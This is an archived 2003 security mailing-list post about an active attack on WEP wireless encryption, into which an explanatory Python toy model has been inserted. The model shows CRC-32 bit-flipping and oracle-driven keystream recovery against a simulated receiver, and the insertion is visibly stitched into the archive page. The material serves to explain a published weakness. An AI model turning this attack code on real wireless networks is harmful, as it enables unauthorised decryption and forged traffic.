Re: V/Scan for Wireless LANs

From: Ivan Arce (ivan.arce@corest.com)
Date: Fri Jul 18 2003 - 19:09:56 EDT


In the first issue (Jan-feb 2003) of the IEEE Security & Privacy magazine
http://csdl.computer.org/comp/mags/sp/2003/01/j1toc.htm

Nick Petroni and Will Arbaugh provide a quite detailed description of
an active attack against WEP that provides full network access to the
wireless LAN (both encryption and decryption) without knowledge of
the secret key within a few hours. The attack takes advantage of the
use of CRC-32 for packet integrity checks and the availability of
known or easily predictable plaintext in common network protocols like
DHCP and ICMP.

"The Dangers of Mitigating Security Design Flaws: A Wireless Case Study"
Nick L. Petroni Jr. and William A. Arbaugh
IEEE Security & Privacy magazine, Jan-Feb 2003, pp 28-36

I don't know of any publicly available implementation of this attack but
it is certainly a good starting point for those willing to code it :)

-ivan

---
Perscriptio in manibus tabellariorum est
Noli me vocare, ego te vocabo
Ivan Arce
CTO
CORE SECURITY TECHNOLOGIES
46 Farnsworth Street
Boston, MA 02210
Ph: 617-399-6980
Fax: 617-399-6987
ivan.arce@coresecurity.com
www.coresecurity.com
PGP Fingerprint: C7A8 ED85 8D7B 9ADC 6836  B25D 207B E78E 2AD1 F65A

R. DuFresne wrote:
> It's been done.  But, I think someone erred earlier in the amount of
> traffic one needs to capture to accomplish this.  I recall it being
> someplace between only 5 and 6 megs of traffic, perhaps 10 if one wished
> to make sure, but, I will enjoy any corrections to my recollections.
> 
> Thanks,
> 
> Ron DuFresne
> 
> On Fri, 18 Jul 2003, Calderone, Denis wrote:
> 
> 
>>A side question for the group on this topic,
>>
>>Has anybody successfully used WEPcrack or Airsnort to crack a 128bit key?  I've never tried.
>>
>>thanks
>>
>>Denis Calderone
>>
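The two properties the message above leans on, CRC-32 being usable as an integrity check that an attacker can satisfy without the key, and predictable plaintext giving away keystream, can be shown in a small model. The following is an added example, not code from the post, from the Petroni/Arbaugh paper or from Core; the IV, the 104-bit key, the captured frame and the receiver are all constructed here, and the "oracle" that reports whether a frame was accepted is an assumed function call standing in for whatever network behaviour a real attacker would have to observe. It demonstrates (1) flipping plaintext bits in a captured frame while keeping the ICV valid, and (2) growing a keystream prefix learned from the predictable LLC/SNAP header into the whole frame by guessing one byte at a time against that oracle, after which the frame can be read and new frames forged for that IV with no knowledge of the secret key.

```python
"""Toy model of WEP's per-frame protection (RC4 keystream + CRC-32 ICV) and two
attacks that need no knowledge of the secret key. Constructed example only."""
import zlib

# Predictable first 8 plaintext bytes of an IP-carrying 802.11 data frame (LLC/SNAP, ethertype 0x0800)
LLC_SNAP = bytes.fromhex("aaaa030000000800")

def rc4_keystream(key: bytes, n: int) -> bytes:
    """RC4 KSA plus n bytes of PRGA output; WEP keys RC4 with IV || secret key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    body = plaintext + icv(plaintext)
    return xor(body, rc4_keystream(iv + key, len(body)))

def wep_decrypt(iv: bytes, key: bytes, ciphertext: bytes):
    """Receiver side: the plaintext if the ICV verifies, else None (frame dropped)."""
    if len(ciphertext) < 4:
        return None
    body = xor(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    return body[:-4] if icv(body[:-4]) == body[-4:] else None

def flip_bits(ciphertext: bytes, delta: bytes) -> bytes:
    """Attack 1, no key: a frame that decrypts to plaintext ^ delta with a valid ICV.
    CRC-32 is affine over GF(2): crc(a ^ b) == crc(a) ^ crc(b) ^ crc(zeros of that length),
    so the ICV correction depends only on delta, never on the unknown plaintext."""
    n = len(ciphertext) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole plaintext")
    return xor(ciphertext, delta + xor(icv(delta), icv(bytes(n))))

def recover_keystream(iv: bytes, oracle, known_ks: bytes, target_len: int) -> bytes:
    """Attack 2, no key: extend a known keystream prefix one byte per round.
    oracle(iv, frame) -> bool is assumed to tell whether the receiver accepted the frame.
    Each round's frame is n bytes encrypted with known keystream plus one guessed byte
    (the last ICV byte); exactly one of the 256 guesses makes the CRC check pass."""
    ks = bytearray(known_ks)
    while len(ks) < target_len:
        n = len(ks)
        msg = bytes(n - 3)                    # any (n-3)-byte message: msg || ICV is n+1 bytes
        body = msg + icv(msg)
        prefix = xor(body[:n], ks)            # correctly encrypted under the known prefix
        for guess in range(256):
            if oracle(iv, prefix + bytes([guess])):
                ks.append(guess ^ body[n])    # accepted => guess == ks[n] ^ body[n]
                break
        else:
            raise RuntimeError("no guess accepted; the known keystream prefix is wrong")
    return bytes(ks)

def demo() -> dict:
    """Constructed scenario: one captured frame starting with LLC/SNAP, plus a receiver to probe."""
    iv = bytes.fromhex("0a1b2c")
    secret = bytes(range(0x10, 0x1d))         # 104-bit key, known only to the network
    payload = LLC_SNAP + b"\x45\x00\x00\x54ICMP echo request body, contents unknown"
    captured = wep_encrypt(iv, secret, payload)
    oracle = lambda iv_, frame: wep_decrypt(iv_, secret, frame) is not None

    # Attack 1: change plaintext byte 8 (0x45 -> 0x47) in the captured frame
    delta = bytes(8) + b"\x02" + bytes(len(payload) - 9)
    flipped = wep_decrypt(iv, secret, flip_bits(captured, delta))

    # Attack 2: 8 keystream bytes from the known header, grown to cover the whole frame
    known_ks = xor(captured[:8], LLC_SNAP)
    ks = recover_keystream(iv, oracle, known_ks, len(captured))
    return {"flip_accepted": flipped is not None,
            "flipped_byte": None if flipped is None else flipped[8],
            "keystream_ok": ks == rc4_keystream(iv + secret, len(captured)),
            "decrypted_ok": xor(captured, ks)[:-4] == payload}

if __name__ == "__main__":
    print(demo())
```

Recovering the keystream costs at most 256 probes per byte, so a full 1500-byte frame needs on the order of a few hundred thousand oracle answers for one IV, which is where the "few hours" in the message comes from rather than any weakness in RC4 itself. The model stops at a single IV; reusing the recovered keystream for other frames requires the same IV, which is a separate part of the picture the paper covers and is not shown here.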


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:37 EDT